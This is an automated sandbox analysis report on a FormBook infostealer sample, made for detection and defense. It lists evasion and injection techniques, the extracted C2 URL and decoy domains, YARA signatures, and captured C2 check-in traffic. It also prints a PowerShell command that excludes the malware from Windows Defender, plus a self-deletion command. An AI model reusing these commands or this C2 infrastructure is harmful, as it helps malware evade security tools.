Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Windows Analysis Report MAPO-PI.exe

Overview

General Information

Sample Name:MAPO-PI.exe
Analysis ID:510736
MD5:c619bbbe3c374c8fd3e9f2c26d087496
SHA1:a8f7e80f2c8e7687789f2267935610f81bc773d4
SHA256:260b61ddee5133e450110555cf0675ad6c015f51e6053c8fdc169db5e01bf993
Tags:exe
Infos:

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
Yara detected AntiVM3
System process connects to network (likely due to code injection or exploit)
Sample uses process hollowing technique
Maps a DLL or memory area into another process
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Modifies the prolog of user mode functions (user mode inline hooks)
Self deletion via cmd delete
.NET source code contains potential unpacker
Sigma detected: Powershell Defender Exclusion
Queues an APC in another process (thread injection)
Tries to detect virtualization through RDTSC time measurements
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Adds a directory exclusion to Windows Defender
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
HTTP GET or POST without a user agent
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Sample file is different than original file name gathered from version info
PE file contains strange resources
Contains functionality to read the PEB
Checks if the current process is being debugged
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

  • System is w10x64
  • MAPO-PI.exe (PID: 3868 cmdline: 'C:\Users\user\Desktop\MAPO-PI.exe' MD5: C619BBBE3C374C8FD3E9F2C26D087496)
    • powershell.exe (PID: 2592 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\MAPO-PI.exe' MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 5196 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • MAPO-PI.exe (PID: 5128 cmdline: C:\Users\user\Desktop\MAPO-PI.exe MD5: C619BBBE3C374C8FD3E9F2C26D087496)
      • explorer.exe (PID: 3472 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • cmmon32.exe (PID: 6928 cmdline: C:\Windows\SysWOW64\cmmon32.exe MD5: 2879B30A164B9F7671B5E6B2E9F8DFDA)
          • cmd.exe (PID: 980 cmdline: /c del 'C:\Users\user\Desktop\MAPO-PI.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 6084 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.diofis.com/rigx/"], "decoy": ["cisworkfromhome.com", "pizzanpickle.com", "southusen.com", "pinarekinci.com", "themilocat.com", "goio.digital", "smoothed-way.com", "lifeinformpodcast.com", "transforming-leadership.com", "winebreak.net", "diversityleadershipprogram.com", "orrisinvest.com", "mylearningplaylist.net", "chiromsrealestate.com", "todaychat.info", "solevux.com", "giacomodifino.com", "escortagents.com", "handstandsandhairties.com", "getsettn.com", "rocketsanitizerbox.com", "ryanmelissa.com", "loiriemagazine.com", "comparedietdrops.com", "email-m3comva.com", "lescopainsdumarche.net", "samhing-hk.com", "themomentummakers.com", "thmmet.com", "theluxgalveston.com", "makelifesimpleagain.com", "133holbertonstreet.com", "ingam.design", "svgrbyts.com", "reunalia.com", "zumish.com", "202scott.com", "onllinetestbot.com", "homeofficetipps.com", "jollyfriendsglobal.com", "gardenstatemasks.com", "parkinsonfound.com", "fitpowersport.com", "decentrall.com", "zodiacoflauderdale.com", "0afd.xyz", "klutinariverfishing.com", "wanderlustmeetsmotherhood.net", "t7890.com", "espressomaschinen.store", "templarsy.com", "parastrong.com", "nongbake.com", "abcjapanese.com", "adorti.com", "sweeplux.com", "ssmjoin.com", "polyassemble.com", "sellmyhihome.com", "pekalonganhost.com", "sautilidades.com", "customwoodcuttingboards.com", "mindyourownbizzness.com", "jiujitsuspa.com"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000003.00000002.292857818.0000000000400000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000003.00000002.292857818.0000000000400000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x9b52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x15675:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x15161:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x15777:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x158ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0xa56a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x143dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xb263:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x1b317:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1c31a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000003.00000002.292857818.0000000000400000.00000040.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x183f9:$sqlite3step: 68 34 1C 7B E1
    • 0x1850c:$sqlite3step: 68 34 1C 7B E1
    • 0x18428:$sqlite3text: 68 38 2A 90 C5
    • 0x1854d:$sqlite3text: 68 38 2A 90 C5
    • 0x1843b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x18563:$sqlite3blob: 68 53 D8 7F 8C
    00000003.00000002.293300061.00000000017B0000.00000040.00020000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000003.00000002.293300061.00000000017B0000.00000040.00020000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x9b52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x15675:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x15161:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x15777:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x158ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0xa56a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x143dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xb263:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x1b317:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1c31a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 30 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      3.0.MAPO-PI.exe.400000.8.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        3.0.MAPO-PI.exe.400000.8.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x8ae8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x8d52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x14875:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x14361:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x14977:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x14aef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x976a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x135dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0xa463:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x1a517:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1b51a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        3.0.MAPO-PI.exe.400000.8.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x175f9:$sqlite3step: 68 34 1C 7B E1
        • 0x1770c:$sqlite3step: 68 34 1C 7B E1
        • 0x17628:$sqlite3text: 68 38 2A 90 C5
        • 0x1774d:$sqlite3text: 68 38 2A 90 C5
        • 0x1763b:$sqlite3blob: 68 53 D8 7F 8C
        • 0x17763:$sqlite3blob: 68 53 D8 7F 8C
        3.0.MAPO-PI.exe.400000.6.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          3.0.MAPO-PI.exe.400000.6.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x9b52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x15675:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x15161:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x15777:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x158ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0xa56a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x143dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xb263:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x1b317:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1c31a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 23 entries

          Sigma Overview

          System Summary:

          barindex
          Sigma detected: Powershell Defender ExclusionShow sources
          Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\MAPO-PI.exe', CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\MAPO-PI.exe', CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: 'C:\Users\user\Desktop\MAPO-PI.exe' , ParentImage: C:\Users\user\Desktop\MAPO-PI.exe, ParentProcessId: 3868, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\MAPO-PI.exe', ProcessId: 2592
          Sigma detected: Non Interactive PowerShellShow sources
          Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\MAPO-PI.exe', CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\MAPO-PI.exe', CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: 'C:\Users\user\Desktop\MAPO-PI.exe' , ParentImage: C:\Users\user\Desktop\MAPO-PI.exe, ParentProcessId: 3868, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\MAPO-PI.exe', ProcessId: 2592
          Sigma detected: T1086 PowerShell ExecutionShow sources
          Source: Pipe createdAuthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: PipeName: \PSHost.132799056056937018.2592.DefaultAppDomain.powershell

          Jbx Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Found malware configurationShow sources
          Source: 00000003.00000002.292857818.0000000000400000.00000040.00000001.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.diofis.com/rigx/"], "decoy": ["cisworkfromhome.com", "pizzanpickle.com", "southusen.com", "pinarekinci.com", "themilocat.com", "goio.digital", "smoothed-way.com", "lifeinformpodcast.com", "transforming-leadership.com", "winebreak.net", "diversityleadershipprogram.com", "orrisinvest.com", "mylearningplaylist.net", "chiromsrealestate.com", "todaychat.info", "solevux.com", "giacomodifino.com", "escortagents.com", "handstandsandhairties.com", "getsettn.com", "rocketsanitizerbox.com", "ryanmelissa.com", "loiriemagazine.com", "comparedietdrops.com", "email-m3comva.com", "lescopainsdumarche.net", "samhing-hk.com", "themomentummakers.com", "thmmet.com", "theluxgalveston.com", "makelifesimpleagain.com", "133holbertonstreet.com", "ingam.design", "svgrbyts.com", "reunalia.com", "zumish.com", "202scott.com", "onllinetestbot.com", "homeofficetipps.com", "jollyfriendsglobal.com", "gardenstatemasks.com", "parkinsonfound.com", "fitpowersport.com", "decentrall.com", "zodiacoflauderdale.com", "0afd.xyz", "klutinariverfishing.com", "wanderlustmeetsmotherhood.net", "t7890.com", "espressomaschinen.store", "templarsy.com", "parastrong.com", "nongbake.com", "abcjapanese.com", "adorti.com", "sweeplux.com", "ssmjoin.com", "polyassemble.com", "sellmyhihome.com", "pekalonganhost.com", "sautilidades.com", "customwoodcuttingboards.com", "mindyourownbizzness.com", "jiujitsuspa.com"]}
          Multi AV Scanner detection for submitted fileShow sources
          Source: MAPO-PI.exeVirustotal: Detection: 30%Perma Link
          Source: MAPO-PI.exeReversingLabs: Detection: 39%
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 3.0.MAPO-PI.exe.400000.8.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.0.MAPO-PI.exe.400000.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.MAPO-PI.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.0.MAPO-PI.exe.400000.6.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.MAPO-PI.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.0.MAPO-PI.exe.400000.8.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.0.MAPO-PI.exe.400000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.MAPO-PI.exe.3734c80.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.MAPO-PI.exe.36e6660.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000003.00000002.292857818.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.293300061.00000000017B0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.293340895.00000000017E0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.238587135.00000000035B9000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000010.00000002.494133182.0000000000A30000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000000.275167353.0000000006D3E000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000000.264363163.0000000006D3E000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000010.00000002.495966407.0000000003030000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000010.00000002.495159274.0000000002D30000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000000.236279072.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000000.235333342.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: 3.0.MAPO-PI.exe.400000.8.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 3.2.MAPO-PI.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 3.0.MAPO-PI.exe.400000.6.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 3.0.MAPO-PI.exe.400000.4.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: MAPO-PI.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
          Source: MAPO-PI.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: cmmon32.pdb source: MAPO-PI.exe, 00000003.00000002.293436175.0000000001850000.00000040.00020000.sdmp
          Source: Binary string: cmmon32.pdbGCTL source: MAPO-PI.exe, 00000003.00000002.293436175.0000000001850000.00000040.00020000.sdmp
          Source: Binary string: wntdll.pdbUGP source: MAPO-PI.exe, 00000003.00000002.293616666.000000000198F000.00000040.00000001.sdmp, cmmon32.exe, 00000010.00000002.497241388.0000000004C40000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: MAPO-PI.exe, cmmon32.exe

          Networking:

          barindex
          Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49795 -> 109.232.217.55:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49795 -> 109.232.217.55:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49795 -> 109.232.217.55:80
          System process connects to network (likely due to code injection or exploit)Show sources
          Source: C:\Windows\explorer.exeNetwork Connect: 159.65.10.143 80
          Source: C:\Windows\explorer.exeDomain query: www.lifeinformpodcast.com
          Source: C:\Windows\explorer.exeDomain query: www.transforming-leadership.com
          Source: C:\Windows\explorer.exeDomain query: www.diofis.com
          Source: C:\Windows\explorer.exeNetwork Connect: 34.102.136.180 80
          Source: C:\Windows\explorer.exeNetwork Connect: 109.232.217.55 80
          C2 URLs / IPs found in malware configurationShow sources
          Source: Malware configuration extractorURLs: www.diofis.com/rigx/
          Source: Joe Sandbox ViewASN Name: DIGITALOCEAN-ASNUS DIGITALOCEAN-ASNUS
          Source: Joe Sandbox ViewASN Name: AEROTEK-ASTR AEROTEK-ASTR
          Source: global trafficHTTP traffic detected: GET /rigx/?8pr=9rQH8&1btd7D=sXodP5plw2zuBk5jc17bfKeMRD93SLnVb+AwVzSLCtQvXrT73UIO1hDRl0kooUZyQ/sm HTTP/1.1Host: www.lifeinformpodcast.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /rigx/?1btd7D=9134s0FnLt/OWarUedgABr9C/c4q5kSlc0KYi18j8Gti+B07oVRLIxAr1gTintGupYIr&8pr=9rQH8 HTTP/1.1Host: www.transforming-leadership.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /rigx/?8pr=9rQH8&1btd7D=x7Tu96cHMgTmU7mY47TISrjDcbGhV6G9B99bVm0ZcSL4vblov6CXxXD4o82KDOntdPMV HTTP/1.1Host: www.diofis.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Thu, 28 Oct 2021 05:41:15 GMTContent-Type: text/htmlContent-Length: 275ETag: "61797038-113"Via: 1.1 googleConnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 28 Oct 2021 05:41:35 GMTServer: ApacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://www.transforming-leadership.com/wp-json/>; rel="https://api.w.org/"Referrer-Policy: no-referrer-when-downgradeConnection: closeTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8Data Raw: 39 37 65 33 0d 0a 0a 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 65 6e 2d 41 55 22 3e 0a 0a 3c 68 65 61 64 3e 0a 20 20 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 69 6e 67 62 61 63 6b 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 74 72 61 6e 73 66 6f 72 6d 69 6e 67 2d 6c 65 61 64 65 72 73 68 69 70 2e 63 6f 6d 2f 78 6d 6c 72 70 63 2e 70 68 70 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6e 6f 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 27 20 2f 3e 0a 0a 09 3c 21 2d 2d 20 54 68 69 73 20 73 69 74 65 20 69 73 20 6f 70 74 69 6d 69 7a 65 64 20 77 69 74 68 20 74 68 65 20 59 6f 61 73 74 20 53 45 4f 20 70 6c 75 67 69 6e 20 76 31 37 2e 34 20 2d 20 68 74 74 70 73 3a 2f 2f 79 6f 61 73 74 2e 63 6f 6d 2f 77 6f 72 64 70 72 65 73 73 2f 70 6c 75 67 69 6e 73 2f 73 65 6f 2f 20 2d 2d 3e 0a 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 2d 20 54 72 61 6e 73 66 6f 72 6d 69 6e 67 20 4c 65 61 64 65 72 73 68 69 70 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 6c 6f 63 61 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 65 6e 5f 55 53 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 74 69 74 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 2d 20 54 72 61 6e 73 66 6f 72 6d 69 6e 67 20 4c 65 61 64 65 72 73 68 69 70 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 73 69 74 65 5f 6e 61 6d 65 22 20 63 6f 6e 74 65 6e 74 3d 22 54 72 61 6e 73 66 6f 72 6d 69 6e 67 20 4c 65 61 64 65 72 73 68 69 70 22 20 2f 3e 0a 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6c 64 2b 6a 73 6f 6e 22 20 63 6c 61 73 73 3d 22 79 6f 61 73 74 2d 73 63 68 65 6d 61 2d 67 72 61 70 68 22 3e 7b 22 40 63 6f 6e 74 65 78 74 22 3a 22 68 74 74 70 73 3a 2f 2f 73 63 68 65 6d 61 2e 6f 72 67 22 2c 22 40 67 72 61 70 68 22 3a 5b 7b 22 40 74 79 70 65 22 3a 22 57 65 62 53 69 74 65 22 2c 22 40 69 64 22 3a 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 74 72 61 6e 73 66 6f 72 6d 69 6e 67 2d 6c 65 61 64 65 72 73 68 69 70 2e 63 6f 6d 2f 23 77 65 62 73 69 74 65 22 2c 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 74 72 61 6e 73 66 6f 72 6d 69 6e 67 2d
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closex-powered-by: PHP/7.4.24content-type: text/html; charset=UTF-8expires: Wed, 11 Jan 1984 05:00:00 GMTcache-control: no-cache, must-revalidate, max-age=0link: <http://www.diofis.com/wp-json/>; rel="https://api.w.org/"x-litespeed-cache: misscontent-length: 33607date: Thu, 28 Oct 2021 05:41:56 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 74 72 22 3e 0a 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 22 3e 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0a 09 09 0a 09 3c 21 2d 2d 20 54 68 69 73 20 73 69 74 65 20 69 73 20 6f 70 74 69 6d 69 7a 65 64 20 77 69 74 68 20 74 68 65 20 59 6f 61 73 74 20 53 45 4f 20 70 6c 75 67 69 6e 20 76 31 35 2e 39 2e 32 20 2d 20 68 74 74 70 73 3a 2f 2f 79 6f 61 73 74 2e 63 6f 6d 2f 77 6f 72 64 70 72 65 73 73 2f 70 6c 75 67 69 6e 73 2f 73 65 6f 2f 20 2d 2d 3e 0a 09 3c 74 69 74 6c 65 3e 53 61 79 66 61 20 62 75 6c 75 6e 61 6d 61 64 c4 b1 20 2d 20 64 69 6f 66 69 73 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 6c 6f 63 61 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 72 5f 54 52 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 74 69 74 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 53 61 79 66 61 20 62 75 6c 75 6e 61 6d 61 64 c4 b1 20 2d 20 64 69 6f 66 69 73 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 73 69 74 65 5f 6e 61 6d 65 22 20 63 6f 6e 74 65 6e 74 3d 22 64 69 6f 66 69 73 22 20 2f 3e 0a 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6c 64 